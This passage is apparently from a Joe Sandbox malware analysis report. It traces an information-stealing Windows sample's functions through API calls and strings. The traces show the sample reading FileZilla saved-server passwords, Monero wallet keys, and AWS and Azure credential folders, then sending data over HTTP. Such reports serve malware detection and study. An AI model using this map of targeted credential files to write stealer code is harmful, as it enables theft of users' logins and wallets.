                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00170250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00180DBA,00180DB7,00180DB6,00180DB3), ref: 00170362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00170369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00170385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 001703CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 001703DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00170419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00170463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 0017051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 0017054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00170562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00170571
                          • lstrcat.KERNEL32(?,url: ), ref: 00170580
                          • lstrcat.KERNEL32(?,00000000), ref: 00170593
                          • lstrcat.KERNEL32(?,00181678), ref: 001705A2
                          • lstrcat.KERNEL32(?,00000000), ref: 001705B5
                          • lstrcat.KERNEL32(?,0018167C), ref: 001705C4
                          • lstrcat.KERNEL32(?,login: ), ref: 001705D3
                          • lstrcat.KERNEL32(?,00000000), ref: 001705E6
                          • lstrcat.KERNEL32(?,00181688), ref: 001705F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00170604
                          • lstrcat.KERNEL32(?,00000000), ref: 00170617
                          • lstrcat.KERNEL32(?,00181698), ref: 00170626
                          • lstrcat.KERNEL32(?,0018169C), ref: 00170635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 0017068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: b214110228dbca203a309b61eebd45cb1723063bf037ed9d95bb9ed24b9b60ba
                          • Instruction ID: d467b5e079ec2aa4bd60cc172cb4b10300d9cf40ac3812915e0c3fd672ead610
                          • Opcode Fuzzy Hash: b214110228dbca203a309b61eebd45cb1723063bf037ed9d95bb9ed24b9b60ba
                          • Instruction Fuzzy Hash: 20D13372900108ABCB05FBF4DD96DEE773CAF69301F908518F106A7095EF75AA46CB62
                          Function 00165960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                            • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001659F8
                          • StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00165A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00165B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00CCFB88,00000000,?,00CCEDD0,00000000,?,00181A1C), ref: 00165E71
                          • lstrlen.KERNEL32(00000000), ref: 00165E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00165E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00165E9A
                          • lstrlen.KERNEL32(00000000), ref: 00165EAF
                          • lstrlen.KERNEL32(00000000), ref: 00165ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00165EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00165F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00165F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00165F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00165FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00165FBD
                          • HttpOpenRequestA.WININET(00000000,00CCFC08,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00165BF8
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • InternetCloseHandle.WININET(00000000), ref: 00165FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: d7069786f869b6f0d3299aa6737c572ab406074c4dcec50b4da5c0c5d59e385f
                          • Instruction ID: d1a8bab3aaad5e17b720a7bc63b8a371964e8ac3733efb18473b5fb64d2c9f10
                          • Opcode Fuzzy Hash: d7069786f869b6f0d3299aa6737c572ab406074c4dcec50b4da5c0c5d59e385f
                          • Instruction Fuzzy Hash: CA12E072860118ABDB15EBA0DC95FEEB37CBF64701F908199B11A63091DF702B49CF66
                          Function 0016CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0016D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0016D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D208
                          • lstrcat.KERNEL32(?,00181478), ref: 0016D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D22A
                          • lstrcat.KERNEL32(?,0018147C), ref: 0016D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D24C
                          • lstrcat.KERNEL32(?,00181480), ref: 0016D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D26E
                          • lstrcat.KERNEL32(?,00181484), ref: 0016D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D290
                          • lstrcat.KERNEL32(?,00181488), ref: 0016D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D2B2
                          • lstrcat.KERNEL32(?,0018148C), ref: 0016D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D2D4
                          • lstrcat.KERNEL32(?,00181490), ref: 0016D2E3
                            • Part of subcall function 0017A820: lstrlen.KERNEL32(00164F05,?,?,00164F05,00180DDE), ref: 0017A82B
                            • Part of subcall function 0017A820: lstrcpy.KERNEL32(00180DDE,00000000), ref: 0017A885
                          • lstrlen.KERNEL32(?), ref: 0016D32A
                          • lstrlen.KERNEL32(?), ref: 0016D339
                            • Part of subcall function 0017AA70: StrCmpCA.SHLWAPI(00CC9428,0016A7A7,?,0016A7A7,00CC9428), ref: 0017AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0016D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 2ef05ec998c9ff54e72b09bf0b90c317d682214f36bd9c14deaf29f43c70740d
                          • Instruction ID: b912257055fefb209113b259eaae4d84b63d542d14bf334d20e3f34c21c99868
                          • Opcode Fuzzy Hash: 2ef05ec998c9ff54e72b09bf0b90c317d682214f36bd9c14deaf29f43c70740d
                          • Instruction Fuzzy Hash: B3E10F72910108ABCB05FBA0DD96EEE777CBF65301F508158F10BA70A1DF35AA06CB62
                          Function 0016C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00CCDA00,00000000,?,0018144C,00000000,?,?), ref: 0016CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0016CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0016CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0016CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0016CAD9
                          • StrStrA.SHLWAPI(?,00CCD9A0,00180B52), ref: 0016CAF7
                          • StrStrA.SHLWAPI(00000000,00CCD9D0), ref: 0016CB1E
                          • StrStrA.SHLWAPI(?,00CCE358,00000000,?,00181458,00000000,?,00000000,00000000,?,00CC9308,00000000,?,00181454,00000000,?), ref: 0016CCA2
                          • StrStrA.SHLWAPI(00000000,00CCE0D8), ref: 0016CCB9
                            • Part of subcall function 0016C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0016C871
                            • Part of subcall function 0016C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0016C87C
                          • StrStrA.SHLWAPI(?,00CCE0D8,00000000,?,0018145C,00000000,?,00000000,00CC9348), ref: 0016CD5A
                          • StrStrA.SHLWAPI(00000000,00CC9288), ref: 0016CD71
                            • Part of subcall function 0016C820: lstrcat.KERNEL32(?,00180B46), ref: 0016C943
                            • Part of subcall function 0016C820: lstrcat.KERNEL32(?,00180B47), ref: 0016C957
                            • Part of subcall function 0016C820: lstrcat.KERNEL32(?,00180B4E), ref: 0016C978
                          • lstrlen.KERNEL32(00000000), ref: 0016CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0016CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: c07fcefeeac3cce2cbdfceb57206693943d3a5af90b9af7649d50aa9c539bd8f
                          • Instruction ID: 6d2ef0cd48fcdbc3ab0f32509895f2f8a994eb64270ad69cfdcbb41d8bfa130f
                          • Opcode Fuzzy Hash: c07fcefeeac3cce2cbdfceb57206693943d3a5af90b9af7649d50aa9c539bd8f
                          • Instruction Fuzzy Hash: E8E1F172D00108ABDB15EBA4DC95FEEB77CAF64301F808159F11A67191EF306A4ACF62
                          Function 00178320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • RegOpenKeyExA.ADVAPI32(00000000,00CC9048,00000000,00020019,00000000,001805B6), ref: 001783A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00178426
                          • wsprintfA.USER32 ref: 00178459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0017847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0017848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00178499
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: 81157298a5af7b023f187d419541d12ec20cb9b45d6aa978daba154c96f42a75
                          • Instruction ID: 545c6604400330c6afa731073b92595498ff7ff953d8977bd89566593065df5a
                          • Opcode Fuzzy Hash: 81157298a5af7b023f187d419541d12ec20cb9b45d6aa978daba154c96f42a75
                          • Instruction Fuzzy Hash: 9D811C72950118ABDB69DB64CC95FEE77BCBF58700F40C298E109A6140DF716B89CFA1
                          Function 00174D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00174DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00174DCD
                            • Part of subcall function 00174910: wsprintfA.USER32 ref: 0017492C
                            • Part of subcall function 00174910: FindFirstFileA.KERNEL32(?,?), ref: 00174943
                          • lstrcat.KERNEL32(?,00000000), ref: 00174E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00174E59
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,00180FDC), ref: 00174971
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,00180FE0), ref: 00174987
                            • Part of subcall function 00174910: FindNextFileA.KERNEL32(000000FF,?), ref: 00174B7D
                            • Part of subcall function 00174910: FindClose.KERNEL32(000000FF), ref: 00174B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00174EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00174EE5
                            • Part of subcall function 00174910: wsprintfA.USER32 ref: 001749B0
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,001808D2), ref: 001749C5
                            • Part of subcall function 00174910: wsprintfA.USER32 ref: 001749E2
                            • Part of subcall function 00174910: PathMatchSpecA.SHLWAPI(?,?), ref: 00174A1E
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,00CCFAF8), ref: 00174A4A
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,00180FF8), ref: 00174A5C
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,?), ref: 00174A70
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,00180FFC), ref: 00174A82
                            • Part of subcall function 00174910: lstrcat.KERNEL32(?,?), ref: 00174A96
                            • Part of subcall function 00174910: CopyFileA.KERNEL32(?,?,00000001), ref: 00174AAC
                            • Part of subcall function 00174910: DeleteFileA.KERNEL32(?), ref: 00174B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
